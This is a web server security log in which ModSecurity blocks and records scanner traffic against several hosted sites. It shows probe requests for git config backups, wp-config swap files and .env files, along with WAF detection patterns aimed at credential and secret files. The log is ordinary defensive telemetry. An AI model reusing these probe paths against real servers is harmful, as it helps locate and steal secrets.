[Tue May 26 14:01:41.537394 2026] [security2:error] [pid 578581:tid 578617] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.git/config.bak"] [unique_id "ahVabZm_8al1sb-umPtmIQAAECM"]
[Tue May 26 14:01:41.540369 2026] [security2:error] [pid 578581:tid 578611] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.git/config.old"] [unique_id "ahVabZm_8al1sb-umPtmIgAAEB0"]
[Tue May 26 14:01:41.551028 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmGgAAECE"]
[Tue May 26 14:01:41.552980 2026] [security2:error] [pid 578581:tid 578626] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.git/config~"] [unique_id "ahVabZm_8al1sb-umPtmJQAAECw"]
[Tue May 26 14:01:42.155773 2026] [security2:error] [pid 578581:tid 578783] [client 4.193.189.92:2191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/b.php"] [unique_id "ahVabpm_8al1sb-umPtmSQAAAEg"]
[Tue May 26 14:01:42.284774 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmGwAAECI"]
[Tue May 26 14:01:42.295022 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmHAAAEB4"]
[Tue May 26 14:01:42.305353 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmHQAAEB8"]
[Tue May 26 14:01:42.328267 2026] [security2:error] [pid 578581:tid 578633] [remote 74.7.241.58:39120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVabpm_8al1sb-umPtmTQAAYzM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common/Key_Value_Cache
[Tue May 26 14:01:42.329195 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmHgAAECY"]
[Tue May 26 14:01:42.398314 2026] [security2:error] [pid 578581:tid 578834] [client 2a01:4f9:2b:1ae5::2:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVabZm_8al1sb-umPtmPwAAezE"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 14:01:42.398736 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmKwAAECo"]
[Tue May 26 14:01:42.401848 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmIAAAECc"]
[Tue May 26 14:01:42.404809 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmLAAAEC4"]
[Tue May 26 14:01:42.406034 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmMwAAEDA"]
[Tue May 26 14:01:42.418757 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmKAAAEC8"]
[Tue May 26 14:01:42.421112 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmKgAAECk"]
[Tue May 26 14:01:42.430350 2026] [security2:error] [pid 578581:tid 578772] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmQgAAAD0"]
[Tue May 26 14:01:42.431950 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmHwAAEBo"]
[Tue May 26 14:01:42.448211 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmJgAAECU"]
[Tue May 26 14:01:42.454260 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmNgAAEDk"]
[Tue May 26 14:01:42.454953 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmKQAAEC0"]
[Tue May 26 14:01:42.455800 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmMQAAEDo"]
[Tue May 26 14:01:42.481910 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabZm_8al1sb-umPtmNwAAECs"]
[Tue May 26 14:01:42.566167 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmTgAAEDQ"]
[Tue May 26 14:01:42.574750 2026] [security2:error] [pid 578581:tid 578641] [remote 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmUAAAEDs"]
[Tue May 26 14:01:42.901072 2026] [security2:error] [pid 578581:tid 578742] [client 4.193.189.92:6402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/buy.php"] [unique_id "ahVabpm_8al1sb-umPtmYQAAAB8"]
[Tue May 26 14:01:43.279958 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmTwAAEEI"]
[Tue May 26 14:01:43.303380 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmUQAAEDw"]
[Tue May 26 14:01:43.398022 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmYwAAEEQ"]
[Tue May 26 14:01:43.402360 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmZAAAEEo"]
[Tue May 26 14:01:43.403040 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmZwAAEE4"]
[Tue May 26 14:01:43.408944 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmaQAAEEY"]
[Tue May 26 14:01:43.409206 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmaAAAEEw"]
[Tue May 26 14:01:43.410368 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmZQAAEEc"]
[Tue May 26 14:01:43.410557 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmYgAAEEU"]
[Tue May 26 14:01:43.414276 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmbwAAEFI"]
[Tue May 26 14:01:43.416742 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmbgAAED0"]
[Tue May 26 14:01:43.417059 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmawAAED4"]
[Tue May 26 14:01:43.433374 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmcAAAEFs"]
[Tue May 26 14:01:43.449051 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmZgAAEE0"]
[Tue May 26 14:01:43.453783 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmbQAAEEM"]
[Tue May 26 14:01:43.469644 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabpm_8al1sb-umPtmagAAED8"]
[Tue May 26 14:01:43.552102 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmeQAAEEg"]
[Tue May 26 14:01:43.616443 2026] [security2:error] [pid 578581:tid 578824] [client 4.193.189.92:6655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/bless.php"] [unique_id "ahVab5m_8al1sb-umPtmjQAAAHE"]
[Tue May 26 14:01:44.046348 2026] [security2:error] [pid 578581:tid 578804] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmjgAAAF0"]
[Tue May 26 14:01:44.381423 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmfQAAEEs"]
[Tue May 26 14:01:44.387781 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmfwAAEE8"]
[Tue May 26 14:01:44.392762 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmfgAAEFE"]
[Tue May 26 14:01:44.400970 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmgwAAEEE"]
[Tue May 26 14:01:44.401332 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmjAAAEFk"]
[Tue May 26 14:01:44.407078 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmgQAAEEA"]
[Tue May 26 14:01:44.407884 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmgAAAEFA"]
[Tue May 26 14:01:44.410373 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmhQAAEFU"]
[Tue May 26 14:01:44.410569 2026] [security2:error] [pid 578581:tid 578800] [client 4.193.189.92:6568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/class-t.api.php"] [unique_id "ahVacJm_8al1sb-umPtmqwAAAFk"]
[Tue May 26 14:01:44.423250 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmiAAAEFg"]
[Tue May 26 14:01:44.424069 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmhwAAEGs"]
[Tue May 26 14:01:44.426430 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmhgAAEFQ"]
[Tue May 26 14:01:44.431692 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmhAAAEFM"]
[Tue May 26 14:01:44.432266 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmkQAAEFc"]
[Tue May 26 14:01:44.451056 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmggAAEGw"]
[Tue May 26 14:01:44.452016 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmlQAAEFo"]
[Tue May 26 14:01:44.453234 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVab5m_8al1sb-umPtmigAAEF0"]
[Tue May 26 14:01:44.542548 2026] [autoindex:error] [pid 578581:tid 578685] [remote 195.178.110.199:38276] AH01276: Cannot serve directory /home2/jhonwy9v/blog.jhonweb.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:01:44.546303 2026] [security2:error] [pid 578581:tid 578692] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVacJm_8al1sb-umPtmswAALm4"]
[Tue May 26 14:01:44.558504 2026] [security2:error] [pid 578581:tid 578683] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/ADMIN/.env"] [unique_id "ahVacJm_8al1sb-umPtmtgAALmU"]
